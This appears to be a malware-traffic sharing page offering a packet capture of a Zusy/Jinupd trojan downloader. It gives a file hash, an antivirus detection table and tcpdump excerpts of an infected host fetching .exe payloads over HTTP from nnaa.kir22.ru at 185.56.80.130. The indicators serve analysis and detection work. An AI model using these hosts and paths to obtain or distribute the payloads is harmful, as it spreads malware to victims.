Zusy Trojan Downloader Dropper Malware Traffic Analysis FULL PCAP File Download nnaa.kir22.ru

Download Attachments

  • 1 pcap 120131
    Date added: January 21, 2017 11:24 pm
    Added by: admin
    File size: 89 KB
    Downloads: 73
SHA256: c4aaea80c893f12bc8f840bdd11eaba545c36ffc8f8fb9d4699aa238b3a679a4
File name: 1201310150340282788.exe
Detection ratio: 49 / 55
Analysis date: 2017-01-21 23:20:20 UTC

Antivirus | Result | Update
Ad-Aware Gen:Variant.Zusy.82257 20170121
AegisLab Troj.W32.Generic!c 20170121
AhnLab-V3 Trojan/Win32.Jackpos.R111286 20170121
Antiy-AVL Trojan/Win32.SGeneric 20170121
Arcabit Trojan.Zusy.D14151 20170121
Avast Win32:Malware-gen 20170121
Avira (no cloud) TR/Jinupd.B.70 20170121
Baidu Win32.Trojan.WisdomEyes.16070401.9500.9790 20170121
BitDefender Gen:Variant.Zusy.82257 20170121
CAT-QuickHeal Trojan.Jackpos.A5 20170121
ClamAV Win.Malware.Jinupd-8 20170121
Comodo UnclassifiedMalware 20170121
Cyren W32/Comrerop.A.gen!Eldorado 20170121
DrWeb Trojan.DownLoader9.22888 20170121
ESET-NOD32 a variant of Win32/Jinupd.B 20170121
Emsisoft Gen:Variant.Zusy.82257 (B) 20170121
2017-01-21 01:21:36.334532 IP 192.168.1.102.50570 > 185.56.80.130.80: Flags [P.], seq 0:307, ack 1, win 256, length 307: HTTP: GET /clients/1201310150340282788.exe HTTP/1.1
E..[\.@........f.8P....P5iR.....P.......GET /clients/1201310150340282788.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: nnaa.kir22.ru
Connection: Keep-Alive
2017-01-21 01:22:12.382440 IP 192.168.1.102.50572 > 185.56.80.130.80: Flags [P.], seq 0:307, ack 1, win 256, length 307: HTTP: GET /clients/1201310150322509270.exe HTTP/1.1
E..[]A@........f.8P....P.+rY..!.P....   ..GET /clients/1201310150322509270.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: nnaa.kir22.ru
Connection: Keep-Alive

2017-01-21 01:22:33.371282 IP 192.168.1.102.50574 > 185.56.80.130.80: Flags [P.], seq 0:307, ack 1, win 256, length 307: HTTP: GET /clients/1201310150322065266.exe HTTP/1.1
E..[].@........f.8P....P./...^.4P.......GET /clients/1201310150322065266.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: nnaa.kir22.ru
Connection: Keep-Alive